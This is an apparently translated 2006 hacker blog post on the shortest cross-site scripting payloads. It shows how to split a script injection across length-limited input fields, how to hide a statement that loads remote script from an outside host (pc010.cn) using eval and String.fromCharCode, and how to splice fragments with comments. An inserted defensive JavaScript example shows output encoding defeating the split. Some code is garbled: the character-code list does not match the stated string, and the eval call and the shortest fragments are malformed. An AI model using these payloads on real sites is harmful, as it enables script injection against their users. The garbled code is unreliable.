Finding the shortest cross-site scripting code (by jmdcw)

Source: VBS small shop

The other day I asked: what is the shortest cross-site statement? In the past, I would have reasoned like this: the normal cross-site code is <script>alert("a")</script>, which comes to 27 characters in total. But I saw an article in the Hacker Manual, "Crazy Cross-Site Trip", which mentions another way of writing cross-site statements:
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.pc010'</script>
<script>z=z+'.cn/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>

These statements are submitted separately. As long as they all end up displayed on the same page, the fragments accumulate in the variable z, whose final value is:
document.write("<script src=http://www.pc010.cn/1.js></script>")

The z variable is then run with the eval() function, which produces the cross-site effect. Lcx commented in the article that the minimum valid code can be 26 letters, namely <script> z = z + d "</script>, so the minimum cross-site length is 26 characters. (While searching for information on the Internet today, I found that this method can use one character fewer, namely <script> z + = d "</script>, replacing =z+ with +=. That brings it down to 25 characters. It is a little sad, though, that I can only make breakthroughs on the foundation of others! :( ) After I replied to Jianxin, he sent back a smiley face. I felt this guy must have found a shorter cross-site method. /Jmdcw/

Sure enough, today I opened the phpwind vulnerability article in the ninth issue of the Hacker Manual (for some reason, I haven't read the magazine carefully for a long time), and it mentions a shorter cross-site code, as follows:
<script>open(/*
*/"http://127"/*
*/+".0.0.1/"/*
*/)</script>

Here, /* and */ are the script's comment delimiters, and the lines are submitted separately. The same condition applies: the submitted code must all appear on one page, as shown below:

<script>open(/* Invalid content, not displayed */"http://127"/* Invalid content, not displayed */+".0.0.1/"/* Invalid content, not displayed */)</script>
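
The joining effect described above, seen from the defender's side, as an added example that is not code from the original article: each fragment passes a per-field length cap, the raw render still yields one complete script element, and HTML-encoding on output leaves none. MAX_LEN, the <td> row template and the function names are assumptions made for this illustration.

```javascript
// Added example. MAX_LEN and the <td> row template are assumptions.
const MAX_LEN = 20; // hypothetical per-field input limit

// The four fragments from the article's open() example, one per field.
const fields = [
  '<script>open(/*',
  '*/"http://127"/*',
  '*/+".0.0.1/"/*',
  '*/)</script>',
];

const ENTITIES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Contextual output encoding for HTML element content.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => ENTITIES[ch]);
}

// A length cap alone: every fragment is short enough to be accepted.
function allWithinCap(values, max = MAX_LEN) {
  return values.every((v) => v.length <= max);
}

// Render the stored fields into one page, raw or encoded.
function render(values, encode) {
  return values.map((v) => `<td>${encode ? escapeHtml(v) : v}</td>`).join('\n');
}

// Extract what a browser would treat as script bodies, with block comments
// removed, to show how the template markup between fields is swallowed.
function scriptBodies(html) {
  const bodies = [];
  const re = /<script\b[^>]*>([\s\S]*?)<\/script\s*>/gi;
  let m;
  while ((m = re.exec(html)) !== null) {
    bodies.push(m[1].replace(/\/\*[\s\S]*?\*\//g, ''));
  }
  return bodies;
}

console.log(allWithinCap(fields));                // the cap is satisfied
console.log(scriptBodies(render(fields, false))); // raw: fragments rejoin
console.log(scriptBodies(render(fields, true)));  // encoded: no script element
```

The length cap never sees the joined statement, so the control that holds is encoding each field at output time, whatever its length.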

So what is the shortest statement? It seems that <script> cannot be split. Apart from that, functions defined by the script language, such as open, cannot run normally once they are split. /jmdcw/

First convert the statement from the top, document.write("<script src=http://www.pc010.cn/1.js></script>"), into its decimal character codes:

100,111, 99,117,109,101,110,116, 46,119,114,105,116,101, 60,115, 99,114,105,112,116, 32,115,114, 104,116,116,112, 47,119,119,119, 46,112, 106,115, 47,115, 99,114,105,112,116, 62,34, 41,59

Run it with eval and String.fromCharCode:
<Script> eval (String. fromCharCode (100,111, 99,117,109,101,110,116, 46,119,114,105,116,101, 60,115, 99,114,105,112,116, 32,115,114, 104,116,116,112, 47,119,119,119, 46,112, 106,115, 47,115, 99,114,105,112,116,) </script>

The following splits it using Jianxin's method:
<script>/*
*/eval(/*
*/String/*
*/./*
*/fromCharCode/*
*/(100,/*
*/111,99,/*
*/......./*
*/59))/*
*/</script>

The longest line is */fromCharCode/*, at 16 characters. Because this is a function name reserved by the script language, it can be seen that the smallest cross-site statement is determined by the function used.

BY lonely hedgehog
2006-12-10
